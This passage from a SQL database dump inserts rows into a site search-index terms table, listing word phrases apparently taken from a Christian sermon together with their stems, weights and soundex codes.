(326687, 'to that till', 'to that till', 0, 1, 1.4, 'T400', 1, '*'),
(326688, 'to their former', 'to their former', 0, 1, 1.5, 'T61656', 1, '*'),
(326689, 'to walk away', 'to walk away', 0, 1, 1.4, 'T420', 1, '*'),
(326690, 'to win or', 'to win or', 0, 1, 1.3, 'T560', 1, '*'),
(326691, 'to you you', 'to you you', 0, 1, 1.3333, 'T000', 1, '*'),
(326692, 'today some', 'todai some', 0, 1, 1.3333, 'T250', 1, '*'),
(326693, 'today some don\'ts', 'todai some don', 0, 1, 1.5667, 'T253532', 1, '*'),
(326694, 'touch the', 'touch the', 0, 1, 1.3, 'T230', 1, '*'),
(326695, 'touch the lord\'s', 'touch the lord', 0, 1, 1.5333, 'T234632', 1, '*'),
(326696, 'treat him', 'treat him', 0, 1, 1.3, 'T635', 1, '*'),
(326697, 'treat him like', 'treat him like', 0, 1, 1.4667, 'T63542', 1, '*'),
(326698, 'tried all', 'tri all', 0, 1, 1.3, 'T634', 1, '*'),
(326699, 'tried all the', 'tri all the', 0, 1, 1.4333, 'T6343', 1, '*'),
(326700, 'trivialize', 'trivial', 0, 0, 0.6667, 'T6142', 1, '*'),
(326701, 'trivialize his', 'trivial his', 0, 1, 1.4667, 'T6142', 1, '*'),
(326702, 'trivialize his operations', 'trivial his operations', 0, 1, 1.8333, 'T614216352', 1, '*'),
(326703, 'trivializing', 'trivial', 0, 0, 0.8, 'T614252', 1, '*'),
(326704, 'trivializing divine', 'trivial divine', 0, 1, 1.6333, 'T614252315', 1, '*'),
(326705, 'trivializing divine communications', 'trivial divine communications', 0, 1, 2, 'T614252315252352', 1, '*'),
(326706, 'under the anointing', 'under the anointing', 0, 1, 1.6333, 'U53635352', 1, '*'),
(326707, 'unto the day', 'unto the day', 0, 1, 1.4, 'U530', 1, '*'),
(326708, 'us is through', 'us is through', 0, 1, 1.4333, 'U2362', 1, '*'),
(326709, 'versions', 'version', 0, 0, 0.5333, 'V6252', 1, '*'),
(326710, 'versions of', 'version of', 0, 1, 1.3667, 'V62521', 1, '*'),
(326711, 'versions of the', 'version of the', 0, 1, 1.5, 'V625213', 1, '*'),
(326712, 'walk away', 'walk away', 0, 1, 1.3, 'W420', 1, '*'),
(326713, 'walk away do', 'walk away do', 0, 1, 1.4, 'W423', 1, '*'),
(326714, 'want the', 'want the', 0, 1, 1.2667, 'W530', 1, '*'),
(326715, 'want the holy', 'want the holy', 0, 1, 1.4333, 'W534', 1, '*'),
(326716, 'want to come', 'want to come', 0, 1, 1.4, 'W5325', 1, '*'),
(326717, 'want to show', 'want to show', 0, 1, 1.4, 'W532', 1, '*'),
(326718, 'way of life', 'wai of life', 0, 1, 1.3667, 'W141', 1, '*'),
(326719, 'ways by', 'wai by', 0, 1, 1.2333, 'W210', 1, '*'),
(326720, 'ways by which', 'wai by which', 0, 1, 1.4333, 'W212', 1, '*'),
(326721, 'what the spirit', 'what the spirit', 0, 1, 1.5, 'W32163', 1, '*'),
(326722, 'what you attack', 'what you attack', 0, 1, 1.5, 'W320', 1, '*'),
(326723, 'when someone', 'when someone', 0, 1, 1.4, 'W525', 1, '*'),
(326724, 'when someone is', 'when someone is', 0, 1, 1.5, 'W5252', 1, '*'),
(326725, 'when that', 'when that', 0, 1, 1.3, 'W530', 1, '*'),
(326726, 'when that happens', 'when that happens', 0, 1, 1.5667, 'W53152', 1, '*'),
(326727, 'when you do', 'when you do', 0, 1, 1.3667, 'W530', 1, '*'),
(326728, 'whenever he', 'whenev he', 0, 1, 1.3667, 'W516', 1, '*'),
(326729, 'whenever he brings', 'whenev he brings', 0, 1, 1.6, 'W5161652', 1, '*'),
(326730, 'where all', 'where all', 0, 1, 1.3, 'W640', 1, '*'),
(326731, 'where all the', 'where all the', 0, 1, 1.4333, 'W643', 1, '*'),
(326732, 'whereby', 'wherebi', 0, 0, 0.4667, 'W610', 1, '*'),
(326733, 'whereby ye', 'wherebi ye', 0, 1, 1.3333, 'W610', 1, '*'),
(326734, 'whereby ye are', 'wherebi ye are', 0, 1, 1.4667, 'W616', 1, '*'),
(326735, 'which the', 'which the', 0, 1, 1.3, 'W230', 1, '*'),
(326736, 'which the holy', 'which the holy', 0, 1, 1.4667, 'W234', 1, '*'),
(326737, 'who will touch', 'who will touch', 0, 1, 1.4667, 'W432', 1, '*'),
(326738, 'will come the', 'will come the', 0, 1, 1.4333, 'W4253', 1, '*'),
(326739, 'will keep you', 'will keep you', 0, 1, 1.4333, 'W421', 1, '*'),
(326740, 'will lose', 'will lose', 0, 1, 1.3, 'W420', 1, '*'),
(326741, 'will lose to', 'will lose to', 0, 1, 1.4, 'W423', 1, '*'),
(326742, 'will not willfully', 'will not willfully', 0, 1, 1.6, 'W453414', 1, '*'),
(326743, 'will touch the', 'will touch the', 0, 1, 1.4667, 'W4323', 1, '*'),
(326744, 'will win', 'will win', 0, 1, 1.2667, 'W450', 1, '*'),
(326745, 'will win at', 'will win at', 0, 1, 1.3667, 'W453', 1, '*'),
(326746, 'willfully', 'willfulli', 0, 0, 0.6, 'W414', 1, '*'),
(326747, 'willfully or', 'willfulli or', 0, 1, 1.4, 'W4146', 1, '*'),
(326748, 'willfully or knowingly', 'willfulli or knowingly', 0, 1, 1.7333, 'W41462524', 1, '*'),
(326749, 'win at', 'win at', 0, 1, 1.2, 'W530', 1, '*'),
(326750, 'win at the', 'win at the', 0, 1, 1.3333, 'W530', 1, '*'),
(326751, 'win or', 'win or', 0, 1, 1.2, 'W560', 1, '*'),
(326752, 'win or win', 'win or win', 0, 1, 1.3333, 'W565', 1, '*'),
(326753, 'win to', 'win to', 0, 1, 1.2, 'W530', 1, '*'),
(326754, 'win to lose', 'win to lose', 0, 1, 1.3667, 'W5342', 1, '*'),
(326755, 'with him any', 'with him any', 0, 1, 1.4, 'W350', 1, '*'),
(326756, 'with him gen', 'with him gen', 0, 1, 1.4, 'W3525', 1, '*'),
(326757, 'with man .”', 'with man .”', 0, 1, 1.3667, 'W350', 1, '*'),
(326758, 'work out let', 'work out let', 0, 1, 1.4, 'W62343', 1, '*'),
(326759, 'world of the', 'world of the', 0, 1, 1.4, 'W64313', 1, '*'),
(326760, 'wrath anger', 'wrath anger', 0, 1, 1.3667, 'W63526', 1, '*'),
(326761, 'wrath anger disobedience', 'wrath anger disobedience', 0, 1, 1.8, 'W63526321352', 1, '*'),
(326762, 'wrote', 'wrote', 0, 0, 0.3333, 'W630', 1, '*'),
(326763, 'wrote a', 'wrote a', 0, 1, 1.2333, 'W630', 1, '*'),
(326764, 'wrote a book', 'wrote a book', 0, 1, 1.4, 'W6312', 1, '*'),
(326765, 'ye are sealed', 'ye are sealed', 0, 1, 1.4333, 'Y6243', 1, '*'),
(326766, 'you attack', 'you attack', 0, 1, 1.3333, 'Y320', 1, '*'),
(326767, 'you attack if', 'you attack if', 0, 1, 1.4333, 'Y321', 1, '*'),
(326768, 'you break', 'you break', 0, 1, 1.3, 'Y162', 1, '*'),
(326769, 'you break into', 'you break into', 0, 1, 1.4667, 'Y16253', 1, '*'),
(326770, 'you enter', 'you enter', 0, 1, 1.3, 'Y536', 1, '*'),
(326771, 'you enter into', 'you enter into', 0, 1, 1.4667, 'Y53653', 1, '*'),
(326772, 'you have tried', 'you have tried', 0, 1, 1.4667, 'Y1363', 1, '*'),
(326773, 'you holy', 'you holy', 0, 1, 1.2667, 'Y400', 1, '*'),
(326774, 'you holy spirit', 'you holy spirit', 0, 1, 1.5, 'Y42163', 1, '*'),
(326775, 'you in jesus', 'you in jesus', 0, 1, 1.4, 'Y520', 1, '*'),
(326776, 'you must avoid', 'you must avoid', 0, 1, 1.4667, 'Y52313', 1, '*'),
(326777, 'you need in', 'you need in', 0, 1, 1.3667, 'Y535', 1, '*'),
(326778, 'you or through', 'you or through', 0, 1, 1.4667, 'Y6362', 1, '*'),
(326779, 'you safe', 'you safe', 0, 1, 1.2667, 'Y210', 1, '*'),
(326780, 'you safe as', 'you safe as', 0, 1, 1.3667, 'Y212', 1, '*'),
(326781, 'you should lose', 'you should lose', 0, 1, 1.5, 'Y24342', 1, '*'),
(326782, 'you today some', 'you today some', 0, 1, 1.4667, 'Y325', 1, '*'),
(326783, 'you want the', 'you want the', 0, 1, 1.4, 'Y530', 1, '*'),
(326784, 'you will win', 'you will win', 0, 1, 1.4, 'Y450', 1, '*'),
(326785, 'you you are', 'you you are', 0, 1, 1.3667, 'Y600', 1, '*'),
(326786, 'you you should', 'you you should', 0, 1, 1.4667, 'Y243', 1, '*'),
(326787, 'your conscience can\'t', 'your conscience can', 0, 1, 1.7, 'Y62525253', 1, '*'),
(326788, 'your daily practice', 'your daily practice', 0, 1, 1.6333, 'Y63416232', 1, '*'),
(326789, 'your first point', 'your first point', 0, 1, 1.5333, 'Y61623153', 1, '*'),
(326790, 'your life be', 'your life be', 0, 1, 1.4, 'Y641', 1, '*'),
(326791, 'your normal', 'your normal', 0, 1, 1.3667, 'Y65654', 1, '*'),
(326792, 'your normal life', 'your normal life', 0, 1, 1.5333, 'Y656541', 1, '*'),
(326793, 'your relationship', 'your relationship', 0, 1, 1.5667, 'Y643521', 2, '*'),
(326794, 'your relationship safe', 'your relationship safe', 0, 1, 1.7333, 'Y64352121', 1, '*'),
(326795, 'your relationship with', 'your relationship with', 0, 1, 1.7333, 'Y6435213', 2, '*'),
(326796, 'your spirit-man', 'your spirit-man', 0, 1, 1.5, 'Y621635', 1, '*'),
(326797, 'your spirit-man 5', 'your spirit-man 5', 0, 1, 1.5667, 'Y621635', 1, '*'),
(326798, 'your spirit-man to', 'your spirit-man to', 0, 1, 1.6, 'Y6216353', 1, '*'),
(326799, '“and the', '“and the', 0, 1, 1.2667, '“530', 1, '*'),
(326800, '“and the lord', '“and the lord', 0, 1, 1.4333, '“53463', 1, '*'),
(326801, '130,000', '130,000', 0, 0, 0.7, '', 1, '*'),
(326802, '130,000 to', '130,000 to', 0, 1, 1.3333, 'T000', 1, '*'),
(326803, '130,000 to buy', '130,000 to buy', 0, 1, 1.4667, 'T100', 1, '*'),
(326804, '14 yet', '14 yet', 0, 1, 1.2, 'Y300', 1, '*'),
(326805, '14 yet who', '14 yet who', 0, 1, 1.3333, 'Y300', 1, '*'),
(326806, '35 years', '35 years', 0, 1, 1.2667, 'Y620', 1, '*'),
(326807, '35 years and', '35 years and', 0, 1, 1.4, 'Y6253', 1, '*'),
(326808, '36th', '36th', 0, 0, 0.2667, 'T000', 1, '*'),
(326809, '36th year', '36th year', 0, 1, 1.3, 'T600', 1, '*'),
(326810, '36th year i', '36th year i', 0, 1, 1.3667, 'T600', 1, '*'),
(326811, '4 14', '4 14', 0, 1, 1.1333, '', 1, '*'),
(326812, '4 14 yet', '4 14 yet', 0, 1, 1.2667, 'Y300', 1, '*'),
(326813, '62', '62', 0, 0, 0.2, '', 1, '*'),
(326814, '62 living', '62 living', 0, 1, 1.3, 'L152', 1, '*'),
(326815, '62 living the', '62 living the', 0, 1, 1.4333, 'L1523', 1, '*'),
(326816, 'a balanced', 'a balanced', 0, 1, 1.3333, 'A14523', 1, '*'),
(326817, 'a balanced idea', 'a balanced idea', 0, 1, 1.5, 'A14523', 1, '*'),
(326818, 'a body as', 'a body as', 0, 1, 1.3, 'A132', 1, '*'),
(326819, 'a businessman', 'a businessman', 0, 1, 1.4333, 'A12525', 1, '*'),
(326820, 'a businessman or', 'a businessman or', 0, 1, 1.5333, 'A125256', 1, '*'),
(326821, 'a businessman to', 'a businessman to', 0, 1, 1.5333, 'A125253', 1, '*'),
(326822, 'a deliberate', 'a deliberate', 0, 1, 1.4, 'A34163', 1, '*'),
(326823, 'a deliberate purposeful', 'a deliberate purposeful', 0, 1, 1.7667, 'A34163161214', 1, '*'),
(326824, 'a foolish', 'a foolish', 0, 1, 1.3, 'A142', 1, '*'),
(326825, 'a foolish christian', 'a foolish christian', 0, 1, 1.6333, 'A1426235', 1, '*'),
(326826, 'a foolish sinner', 'a foolish sinner', 0, 1, 1.5333, 'A14256', 1, '*'),
(326827, 'a governor', 'a governor', 0, 1, 1.3333, 'A21656', 1, '*'),
(326828, 'a governor a', 'a governor a', 0, 1, 1.4, 'A21656', 1, '*'),
(326829, 'a helicopter', 'a helicopter', 0, 1, 1.4, 'A42136', 1, '*'),
(326830, 'a helicopter god', 'a helicopter god', 0, 1, 1.5333, 'A4213623', 1, '*'),
(326831, 'a helicopter i', 'a helicopter i', 0, 1, 1.4667, 'A42136', 1, '*'),
(326832, 'a helicopter in', 'a helicopter in', 0, 1, 1.5, 'A421365', 1, '*'),
(326833, 'a helicopter where', 'a helicopter where', 0, 1, 1.6, 'A42136', 1, '*'),
(326834, 'a home', 'a home', 0, 1, 1.2, 'A500', 1, '*'),
(326835, 'a home atmosphere', 'a home atmosphere', 0, 1, 1.5667, 'A535216', 1, '*'),
(326836, 'a housewife god', 'a housewife god', 0, 1, 1.5, 'A2123', 1, '*'),
(326837, 'a human body', 'a human body', 0, 1, 1.4, 'A513', 1, '*'),
(326838, 'a president', 'a president', 0, 1, 1.3667, 'A162353', 1, '*'),
(326839, 'a president a', 'a president a', 0, 1, 1.4333, 'A162353', 1, '*'),
(326840, 'a prime', 'a prime', 0, 1, 1.2333, 'A165', 1, '*'),
(326841, 'a prime minister', 'a prime minister', 0, 1, 1.5333, 'A165236', 1, '*'),
(326842, 'a process of', 'a process of', 0, 1, 1.4, 'A1621', 1, '*'),
(326843, 'a professional', 'a professional', 0, 1, 1.4667, 'A161254', 1, '*'),
(326844, 'a professional that', 'a professional that', 0, 1, 1.6333, 'A1612543', 1, '*'),
(326845, 'a prophet under', 'a prophet under', 0, 1, 1.5, 'A1613536', 1, '*'),
(326846, 'a purpose', 'a purpose', 0, 1, 1.3, 'A1612', 1, '*'),
(326847, 'a purpose if', 'a purpose if', 0, 1, 1.4, 'A16121', 1, '*'),
(326848, 'a senator', 'a senator', 0, 1, 1.3, 'A2536', 1, '*'),
(326849, 'a senator a', 'a senator a', 0, 1, 1.3667, 'A2536', 1, '*'),
(326850, 'a sister', 'a sister', 0, 1, 1.2667, 'A236', 1, '*'),
(326851, 'a sister who', 'a sister who', 0, 1, 1.4, 'A236', 1, '*'),
(326852, 'a spirit and', 'a spirit and', 0, 1, 1.4, 'A216353', 1, '*'),
(326853, 'a womb', 'a womb', 0, 1, 1.2, 'A510', 1, '*'),
(326854, 'a womb for', 'a womb for', 0, 1, 1.3333, 'A516', 1, '*'),
(326855, 'ability to recognize', 'abil to recognize', 0, 1, 1.6667, 'A1436252', 1, '*'),
(326856, 'ability to use', 'abil to use', 0, 1, 1.4667, 'A1432', 1, '*'),
(326857, 'able to have', 'abl to have', 0, 1, 1.4, 'A1431', 1, '*'),
(326858, 'able to recognizecritical', 'abl to recognizecritical', 0, 1, 1.8333, 'A14362526324', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(326859, 'able to trace', 'abl to trace', 0, 1, 1.4333, 'A14362', 1, '*'),
(326860, 'about that', 'about that', 0, 1, 1.3333, 'A130', 1, '*'),
(326861, 'about that calling', 'about that calling', 0, 1, 1.6, 'A132452', 1, '*'),
(326862, 'about that you', 'about that you', 0, 1, 1.4667, 'A130', 1, '*'),
(326863, 'about to miss', 'about to miss', 0, 1, 1.4333, 'A1352', 1, '*'),
(326864, 'accidental', 'accident', 0, 0, 0.6667, 'A23534', 1, '*'),
(326865, 'accidental it', 'accident it', 0, 1, 1.4333, 'A235343', 1, '*'),
(326866, 'accidental it was', 'accident it was', 0, 1, 1.5667, 'A2353432', 1, '*'),
(326867, 'account and', 'account and', 0, 1, 1.3667, 'A25353', 1, '*'),
(326868, 'account and then', 'account and then', 0, 1, 1.5333, 'A253535', 1, '*'),
(326869, 'account before', 'account before', 0, 1, 1.4667, 'A25316', 1, '*'),
(326870, 'account before he', 'account before he', 0, 1, 1.5667, 'A25316', 1, '*'),
(326871, 'account i', 'account i', 0, 1, 1.3, 'A253', 1, '*'),
(326872, 'account i have', 'account i have', 0, 1, 1.4667, 'A2531', 1, '*'),
(326873, 'account it', 'account it', 0, 1, 1.3333, 'A253', 1, '*'),
(326874, 'account it was', 'account it was', 0, 1, 1.4667, 'A2532', 1, '*'),
(326875, 'account now', 'account now', 0, 1, 1.3667, 'A2535', 1, '*'),
(326876, 'account now for', 'account now for', 0, 1, 1.5, 'A253516', 1, '*'),
(326877, 'account of', 'account of', 0, 1, 1.3333, 'A2531', 1, '*'),
(326878, 'account of the', 'account of the', 0, 1, 1.4667, 'A25313', 1, '*'),
(326879, 'account one', 'account one', 0, 1, 1.3667, 'A2535', 1, '*'),
(326880, 'account one of', 'account one of', 0, 1, 1.4667, 'A25351', 1, '*'),
(326881, 'account rela', 'account rela', 0, 1, 1.4, 'A25364', 1, '*'),
(326882, 'account rela t', 'account rela t', 0, 1, 1.4667, 'A253643', 1, '*'),
(326883, 'account that', 'account that', 0, 1, 1.4, 'A253', 1, '*'),
(326884, 'account that solomon', 'account that solomon', 0, 1, 1.6667, 'A253245', 1, '*'),
(326885, 'account you cannot', 'account you cannot', 0, 1, 1.6, 'A253253', 1, '*'),
(326886, 'account you have', 'account you have', 0, 1, 1.5333, 'A2531', 1, '*'),
(326887, 'accounts', 'account', 0, 0, 0.5333, 'A2532', 1, '*'),
(326888, 'accounts and', 'account and', 0, 1, 1.4, 'A253253', 1, '*'),
(326889, 'accounts and they', 'account and they', 0, 1, 1.5667, 'A253253', 1, '*'),
(326890, 'accounts are', 'account are', 0, 1, 1.4, 'A25326', 1, '*'),
(326891, 'accounts are opened', 'account are opened', 0, 1, 1.6333, 'A25326153', 1, '*'),
(326892, 'accounts f', 'account f', 0, 1, 1.3333, 'A25321', 1, '*'),
(326893, 'accounts f aith', 'account f aith', 0, 1, 1.5, 'A253213', 1, '*'),
(326894, 'accounts t', 'account t', 0, 1, 1.3333, 'A25323', 1, '*'),
(326895, 'accounts t o', 'account t o', 0, 1, 1.4, 'A25323', 1, '*'),
(326896, 'accounts these', 'account these', 0, 1, 1.4667, 'A253232', 1, '*'),
(326897, 'accounts these accounts', 'account these accounts', 0, 1, 1.7667, 'A253232532', 1, '*'),
(326898, 'accounts were', 'account were', 0, 1, 1.4333, 'A25326', 1, '*'),
(326899, 'accounts were opened', 'account were opened', 0, 1, 1.6667, 'A25326153', 1, '*'),
(326900, 'accounts you', 'account you', 0, 1, 1.4, 'A2532', 1, '*'),
(326901, 'accounts you have', 'account you have', 0, 1, 1.5667, 'A25321', 1, '*'),
(326902, 'advantage and', 'advantag and', 0, 1, 1.4333, 'A3153253', 1, '*'),
(326903, 'advantage and you', 'advantag and you', 0, 1, 1.5667, 'A3153253', 1, '*'),
(326904, 'again certain', 'again certain', 0, 1, 1.4333, 'A252635', 1, '*'),
(326905, 'again certain critical', 'again certain critical', 0, 1, 1.7333, 'A25263526324', 1, '*'),
(326906, 'again person', 'again person', 0, 1, 1.4, 'A251625', 1, '*'),
(326907, 'again person is', 'again person is', 0, 1, 1.5, 'A2516252', 1, '*'),
(326908, 'aith', 'aith', 0, 0, 0.2667, 'A300', 1, '*'),
(326909, 'aith account', 'aith account', 0, 1, 1.4, 'A3253', 1, '*'),
(326910, 'aith account you', 'aith account you', 0, 1, 1.5333, 'A3253', 1, '*'),
(326911, 'all made', 'all made', 0, 1, 1.2667, 'A453', 1, '*'),
(326912, 'all made different', 'all made different', 0, 1, 1.6, 'A4531653', 1, '*'),
(326913, 'all my faith', 'all my faith', 0, 1, 1.4, 'A4513', 1, '*'),
(326914, 'all our salvation', 'all our salvation', 0, 1, 1.5667, 'A4624135', 1, '*'),
(326915, 'all these accounts', 'all these accounts', 0, 1, 1.6, 'A432532', 1, '*'),
(326916, 'all your training', 'all your training', 0, 1, 1.5667, 'A463652', 1, '*'),
(326917, 'along these', 'along these', 0, 1, 1.3667, 'A45232', 1, '*'),
(326918, 'along these seven', 'along these seven', 0, 1, 1.5667, 'A4523215', 1, '*'),
(326919, 'am currently', 'am currently', 0, 1, 1.4, 'A526534', 1, '*'),
(326920, 'am currently doing', 'am currently doing', 0, 1, 1.6, 'A526534352', 1, '*'),
(326921, 'amazing', 'amaz', 0, 0, 0.4667, 'A5252', 1, '*'),
(326922, 'amazing how', 'amaz how', 0, 1, 1.3667, 'A5252', 1, '*'),
(326923, 'amazing how people', 'amaz how people', 0, 1, 1.6, 'A525214', 1, '*'),
(326924, 'an account', 'an account', 0, 1, 1.3333, 'A5253', 1, '*'),
(326925, 'an account of', 'an account of', 0, 1, 1.4333, 'A52531', 1, '*'),
(326926, 'an anointing the', 'an anointing the', 0, 1, 1.5333, 'A53523', 1, '*'),
(326927, 'an assignment for', 'an assignment for', 0, 1, 1.5667, 'A525316', 1, '*'),
(326928, 'an official', 'an official', 0, 1, 1.3667, 'A5124', 1, '*'),
(326929, 'an official capacity', 'an official capacity', 0, 1, 1.6667, 'A51242123', 1, '*'),
(326930, 'and authority', 'and authority', 0, 1, 1.4333, 'A5363', 1, '*'),
(326931, 'and authority to', 'and authority to', 0, 1, 1.5333, 'A5363', 1, '*'),
(326932, 'and disobedience', 'and disobedience', 0, 1, 1.5333, 'A5321352', 1, '*'),
(326933, 'and disobedience can', 'and disobedience can', 0, 1, 1.6667, 'A53213525', 1, '*'),
(326934, 'and distinguish', 'and distinguish', 0, 1, 1.5, 'A532352', 1, '*'),
(326935, 'and distinguish between', 'and distinguish between', 0, 1, 1.7667, 'A532352135', 1, '*'),
(326936, 'and do it', 'and do it', 0, 1, 1.3, 'A530', 1, '*'),
(326937, 'and facilitate', 'and facilitate', 0, 1, 1.4667, 'A531243', 1, '*'),
(326938, 'and facilitate the', 'and facilitate the', 0, 1, 1.6, 'A531243', 1, '*'),
(326939, 'and god ordered', 'and god ordered', 0, 1, 1.5, 'A53236363', 1, '*'),
(326940, 'and he could', 'and he could', 0, 1, 1.4, 'A53243', 1, '*'),
(326941, 'and how god', 'and how god', 0, 1, 1.3667, 'A5323', 1, '*'),
(326942, 'and i start', 'and i start', 0, 1, 1.3667, 'A532363', 1, '*'),
(326943, 'and in an', 'and in an', 0, 1, 1.3, 'A535', 1, '*'),
(326944, 'and in this', 'and in this', 0, 1, 1.3667, 'A53532', 1, '*'),
(326945, 'and it is', 'and it is', 0, 1, 1.3, 'A532', 1, '*'),
(326946, 'and labouring', 'and labouring', 0, 1, 1.4333, 'A5341652', 1, '*'),
(326947, 'and labouring over', 'and labouring over', 0, 1, 1.6, 'A534165216', 1, '*'),
(326948, 'and miraculously', 'and miraculously', 0, 1, 1.5333, 'A53562424', 1, '*'),
(326949, 'and miraculously for', 'and miraculously for', 0, 1, 1.6667, 'A5356242416', 1, '*'),
(326950, 'and not deliver', 'and not deliver', 0, 1, 1.5, 'A5353416', 1, '*'),
(326951, 'and once he', 'and once he', 0, 1, 1.3667, 'A5352', 1, '*'),
(326952, 'and problems', 'and problems', 0, 1, 1.4, 'A53161452', 1, '*'),
(326953, 'and problems you', 'and problems you', 0, 1, 1.5333, 'A53161452', 1, '*'),
(326954, 'and put esther', 'and put esther', 0, 1, 1.4667, 'A5313236', 1, '*'),
(326955, 'and put it', 'and put it', 0, 1, 1.3333, 'A5313', 1, '*'),
(326956, 'and put you', 'and put you', 0, 1, 1.3667, 'A5313', 1, '*'),
(326957, 'and service', 'and service', 0, 1, 1.3667, 'A532612', 1, '*'),
(326958, 'and service the', 'and service the', 0, 1, 1.5, 'A5326123', 1, '*'),
(326959, 'and service them', 'and service them', 0, 1, 1.5333, 'A53261235', 1, '*'),
(326960, 'and showed', 'and showed', 0, 1, 1.3333, 'A5323', 1, '*'),
(326961, 'and showed me', 'and showed me', 0, 1, 1.4333, 'A53235', 1, '*'),
(326962, 'and that god', 'and that god', 0, 1, 1.4, 'A5323', 1, '*'),
(326963, 'and they have', 'and they have', 0, 1, 1.4333, 'A531', 1, '*'),
(326964, 'and they may', 'and they may', 0, 1, 1.4, 'A535', 1, '*'),
(326965, 'and to tomorrow', 'and to tomorrow', 0, 1, 1.5, 'A5356', 1, '*'),
(326966, 'and tomorrow you', 'and tomorrow you', 0, 1, 1.5333, 'A5356', 1, '*'),
(326967, 'and walkable', 'and walkable', 0, 1, 1.4, 'A534214', 1, '*'),
(326968, 'and where', 'and where', 0, 1, 1.3, 'A536', 1, '*'),
(326969, 'and where will', 'and where will', 0, 1, 1.4667, 'A5364', 1, '*'),
(326970, 'angels are', 'angel are', 0, 1, 1.3333, 'A52426', 1, '*'),
(326971, 'angels are recording', 'angel are recording', 0, 1, 1.6667, 'A5242626352', 1, '*'),
(326972, 'anointed for', 'anoint for', 0, 1, 1.4, 'A5316', 1, '*'),
(326973, 'anointed for we', 'anoint for we', 0, 1, 1.5, 'A5316', 1, '*'),
(326974, 'anointing account', 'anoint account', 0, 1, 1.5667, 'A535253', 1, '*'),
(326975, 'anointing account and', 'anoint account and', 0, 1, 1.7, 'A53525353', 1, '*'),
(326976, 'anointing makes', 'anoint makes', 0, 1, 1.5, 'A535252', 1, '*'),
(326977, 'anointing makes the', 'anoint makes the', 0, 1, 1.6333, 'A5352523', 1, '*'),
(326978, 'anointing the anointing', 'anoint the anointing', 0, 1, 1.7667, 'A535235352', 1, '*'),
(326979, 'another but', 'anoth but', 0, 1, 1.3667, 'A53613', 1, '*'),
(326980, 'another but every', 'anoth but every', 0, 1, 1.5667, 'A5361316', 1, '*'),
(326981, 'another person', 'anoth person', 0, 1, 1.4667, 'A5361625', 1, '*'),
(326982, 'another person that', 'anoth person that', 0, 1, 1.6333, 'A53616253', 1, '*'),
(326983, 'any problem really', 'ani problem really', 0, 1, 1.6, 'A51614564', 1, '*'),
(326984, 'are a governor', 'ar a governor', 0, 1, 1.4667, 'A621656', 1, '*'),
(326985, 'are all made', 'ar all made', 0, 1, 1.4, 'A6453', 1, '*'),
(326986, 'are anointed', 'ar anointed', 0, 1, 1.4, 'A653', 1, '*'),
(326987, 'are anointed for', 'ar anointed for', 0, 1, 1.5333, 'A65316', 1, '*'),
(326988, 'are going it\'s', 'ar going it', 0, 1, 1.4667, 'A625232', 1, '*'),
(326989, 'are here', 'ar here', 0, 1, 1.2667, 'A600', 1, '*'),
(326990, 'are here on', 'ar here on', 0, 1, 1.3667, 'A650', 1, '*'),
(326991, 'are here to', 'ar here to', 0, 1, 1.3667, 'A630', 1, '*'),
(326992, 'are men', 'ar men', 0, 1, 1.2333, 'A650', 1, '*'),
(326993, 'are men that', 'ar men that', 0, 1, 1.4, 'A653', 1, '*'),
(326994, 'are on official', 'ar on official', 0, 1, 1.5, 'A65124', 1, '*'),
(326995, 'are opened', 'ar opened', 0, 1, 1.3333, 'A6153', 1, '*'),
(326996, 'are opened angels', 'ar opened angels', 0, 1, 1.5667, 'A61535242', 1, '*'),
(326997, 'are recording', 'ar recording', 0, 1, 1.4333, 'A626352', 1, '*'),
(326998, 'are recording god', 'ar recording god', 0, 1, 1.5667, 'A6263523', 1, '*'),
(326999, 'arrival when', 'arriv when', 0, 1, 1.4, 'A6145', 1, '*'),
(327000, 'arrival when you', 'arriv when you', 0, 1, 1.5333, 'A6145', 1, '*'),
(327001, 'as a housewife', 'as a housewife', 0, 1, 1.4667, 'A210', 1, '*'),
(327002, 'as a human', 'as a human', 0, 1, 1.3333, 'A250', 1, '*'),
(327003, 'as a spirit', 'as a spirit', 0, 1, 1.3667, 'A2163', 1, '*'),
(327004, 'as job', 'as job', 0, 1, 1.2, 'A210', 1, '*'),
(327005, 'as job god', 'as job god', 0, 1, 1.3333, 'A2123', 1, '*'),
(327006, 'as this her', 'as this her', 0, 1, 1.3667, 'A2326', 1, '*'),
(327007, 'as this....”', 'as this....”', 0, 1, 1.4, 'A232', 1, '*'),
(327008, 'as this....” mordecai', 'as this....” mordecai', 0, 1, 1.7, 'A2325632', 1, '*'),
(327009, 'as to', 'as to', 0, 1, 1.1667, 'A230', 1, '*'),
(327010, 'as to be', 'as to be', 0, 1, 1.2667, 'A231', 1, '*'),
(327011, 'as your faith', 'as your faith', 0, 1, 1.4333, 'A2613', 1, '*'),
(327012, 'ask yourself which', 'ask yourself which', 0, 1, 1.6, 'A262412', 1, '*'),
(327013, 'assignment assignment', 'assign assignment', 0, 1, 1.7, 'A253253', 1, '*'),
(327014, 'assignment assignment is', 'assign assignment is', 0, 1, 1.8, 'A2532532', 1, '*'),
(327015, 'assignment at', 'assign at', 0, 1, 1.4333, 'A253', 1, '*'),
(327016, 'assignment at that', 'assign at that', 0, 1, 1.6, 'A253', 1, '*'),
(327017, 'assignment for', 'assign for', 0, 1, 1.4667, 'A25316', 1, '*'),
(327018, 'assignment for joseph', 'assign for joseph', 0, 1, 1.7, 'A2531621', 1, '*'),
(327019, 'assignment for mary', 'assign for mary', 0, 1, 1.6333, 'A2531656', 1, '*'),
(327020, 'assignment for you', 'assign for you', 0, 1, 1.6, 'A25316', 1, '*'),
(327021, 'assignment for your', 'assign for your', 0, 1, 1.6333, 'A25316', 1, '*'),
(327022, 'assignment god raised', 'assign god raised', 0, 1, 1.7, 'A25323623', 1, '*'),
(327023, 'assignment he', 'assign he', 0, 1, 1.4333, 'A253', 1, '*'),
(327024, 'assignment he commits', 'assign he commits', 0, 1, 1.7, 'A2532532', 1, '*'),
(327025, 'assignment if', 'assign if', 0, 1, 1.4333, 'A2531', 1, '*'),
(327026, 'assignment if you', 'assign if you', 0, 1, 1.5667, 'A2531', 1, '*'),
(327027, 'assignment in the', 'assign in the', 0, 1, 1.5667, 'A25353', 1, '*'),
(327028, 'assignment is not', 'assign is not', 0, 1, 1.5667, 'A253253', 1, '*'),
(327029, 'assignment it\'s', 'assign it', 0, 1, 1.5, 'A2532', 1, '*'),
